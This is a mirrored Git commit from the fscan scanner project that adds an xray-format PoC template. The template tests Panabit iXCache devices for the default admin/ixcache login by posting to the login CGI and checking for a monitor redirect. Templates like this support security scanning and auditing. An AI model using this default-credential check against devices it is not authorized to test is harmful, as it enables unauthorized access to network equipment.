mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 05:01:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,11 @@
|
||||
name: poc-yaml-panabit-ixcache-default-password
|
||||
rules:
|
||||
- method: POST
|
||||
path: /login/userverify.cgi
|
||||
body: username=admin&password=ixcache
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi")
|
||||
detail:
|
||||
author: B1anda0(https://github.com/B1anda0)
|
||||
links:
|
||||
- http://forum.panabit.com/thread-10830-1-1.html
|
||||
Reference in New Issue
Block a user